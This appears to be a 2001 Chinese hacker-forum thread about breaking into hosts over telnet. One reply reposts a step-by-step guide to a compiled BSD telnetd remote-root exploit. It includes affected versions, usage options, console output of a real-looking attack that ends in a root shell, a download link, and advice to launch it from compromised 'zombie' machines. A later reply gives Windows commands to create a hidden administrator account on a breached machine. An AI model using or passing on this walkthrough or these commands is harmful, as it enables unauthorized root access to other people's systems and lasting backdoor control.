|
作者
|
标题: TELNET的侵入!!!
|
风狼
未注册
|
|
| |
你好:
我用了TELNET的命令了,不过是看到了一个文本那个文本是不是能得到密码那?我应怎么做那??
| | |
IP: 已记录
|
|
|
瑞火
未注册
|
|
| |
> 7/24红客联盟网站存放的虚拟主机被黑,
> 真正的原因是*bsd的telnetd远程溢出漏洞。
>
> 受影响的系统有:
> BSDI BSD/OS 4.0.1
> BSDI BSD/OS 4.0
> FreeBSD FreeBSD 5.0
> FreeBSD FreeBSD 4.3
> FreeBSD FreeBSD 4.2
> FreeBSD FreeBSD 4.1.1
> FreeBSD FreeBSD 4.1
> FreeBSD FreeBSD 4.0
> FreeBSD FreeBSD 3.x
> FreeBSD FreeBSD 2.x
> NetBSD NetBSD 1.5.1
> NetBSD NetBSD 1.5
> NetBSD NetBSD 1.4.3
> NetBSD NetBSD 1.4.2
> NetBSD NetBSD 1.4.1
> NetBSD NetBSD 1.4
> NetBSD NetBSD 1.3.3
> NetBSD NetBSD 1.3.2
> NetBSD NetBSD 1.3.1
> NetBSD NetBSD 1.3
> NetBSD NetBSD 1.2.1
> NetBSD NetBSD 1.2
> NetBSD NetBSD 1.1
> NetBSD NetBSD 1.0
> Netkit Linux Netkit 0.12
> Netkit Linux Netkit 0.11
> Netkit Linux Netkit 0.10
> OpenBSD OpenBSD 2.8
> OpenBSD OpenBSD 2.7
> OpenBSD OpenBSD 2.6
> OpenBSD OpenBSD 2.5
> OpenBSD OpenBSD 2.4
> OpenBSD OpenBSD 2.3
> OpenBSD OpenBSD 2.2
> OpenBSD OpenBSD 2.1
> OpenBSD OpenBSD 2.0
> SGI IRIX 6.5
> Sun Solaris 8.0
> Sun Solaris 7.0
> Sun Solaris 2.6
>
> 或许将发现更多系统受这个漏洞的影响。
>
> 网上现在已经流传了一份exploit.是针对*bsd的,
> tested: FreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE
> NetBSD 1.5
> BSDI BSD/OS 4.1
> 我现在编译了它,使它能够在windows下运行。
>
> 使用方法为:
> 1.把包里的文件解压到同一个目录
>
> 2.运行bsd.exe查看运行选项。
> ====================================================
> + Compiled by http://www.cnhonker.com lion +
> + Have a goodluck! +
> ====================================================
>
> 7350854 - x86/bsd telnetd remote root
> by zip, lorian, smiler and scut.
>
> usage: bsd [-n <num>] [-c] [-f] <ip>
>
> -n num number of populators, for testing purposes
> -c check exploitability only, do not exploit
> -f force mode, override check results
>
> WARNING: this is no easy exploit, we have to get things tightly aligned and
> send 16/34mb of traffic to the remote telnet daemon. it might not be able to
> take that, or it will take very long for it (> 1h). beware.
>
> tested: FreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE
> NetBSD 1.5
> BSDI BSD/OS 4.1
>
>
> C:\>
>
> 3.测试目标主机是否有telnetd漏洞
> C:\>bsd -c 202.108.*.*
> ====================================================
> + Compiled by http://www.cnhonker.com lion +
> + Have a goodluck! +
> ====================================================
>
> 7350854 - x86/bsd telnetd remote root
> by zip, lorian, smiler and scut.
>
> check: PASSED, using 16mb mode
>
> 4. 对目标系统进行攻击
> C:\>bsd -f 202.108.*.*
> ====================================================
> + Compiled by http://www.cnhonker.com lion +
> + Have a goodluck! +
> ====================================================
>
> 7350854 - x86/bsd telnetd remote root
> by zip, lorian, smiler and scut.
>
> check: PASSED, using 16mb mode
>
> #############################################################################
>
> ok baby, times are rough, we send 16mb traffic to the remote
> telnet daemon process, it will spill badly. but then, there is no
> other way, sorry...
>
> ## setting populators to populate heap address space
> ## number of setenvs (dots / network): 31500
> ## number of walks (percentage / cpu): 496140750
> ##
> ## the percentage is more realistic than the dots 
> percent |--------------------------------------------------------| ETA |
> 99.37% |....................................................... | 00:00:00 |
>
> ## sleeping for 10 seconds to let the process recover
> ## ok, you should now have a root shell
> ## as always, after hard times, there is a reward...
>
>
> command: ?id
> uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator),
> 20(staff), 31(guest)
> uname -a
> FreeBSD ***.***.com 3.5.1-RELEASE FreeBSD 3.5.1-RELEASE #0: Tue Oct 31 20:05:46
> CST 2000 ding@***.***.com :/usr/src/sys/compile/DING i386
>
>
> 成功溢出!
>
> 5.因为这个exploit溢出一台机器需要发送16M的数据包,请大家换带宽高的肉鸡运行,并耐
> 心等候几分钟。请大家使用前用-c选项对目标系统进行测试。如果显示check: PASSED, using
> 16mb mode表示有这个漏洞,否则显示FAILED.
>
> 6.请正确使用本程序,任何非法入侵与本人无关。by: lion 2001/7/27
下载地址:
http://home.dqt.com.cn/~safeinfo/bsdhacking.zip
请谨慎使用,禁止对国内站点,进行工具使用测试!
[被 瑞火 编辑过(日期 07-30-2001)]
| | |
IP: 已记录
|
|
|
风狼
未注册
|
|
| |
你好:
你的这个方法我知道!!那个软件我也有,我说的是不用这种软件,我能登陆他的主机,不过我在他的机器里就没有办法得到他的密码!能说一下比较好的方法吗? 谢谢!! 为我们的目标开始努力,建立我们自己的数字化队!!
兵团!!
没有不可能的事!
没有不可能完成的任务!
我一直在努力!
| | |
IP: 已记录
|
|
|
网络之隼
未注册
|
|
| |
楼上是朋友,如果你登陆有system权限的话,你可以自己创建一个用户,并加入administrators
你就无须破他的密码了net user 用户名 密码 /add net localgroup administrators 用户名 /add
| | |
IP: 已记录
|
|
|
|
适于打印的主题视图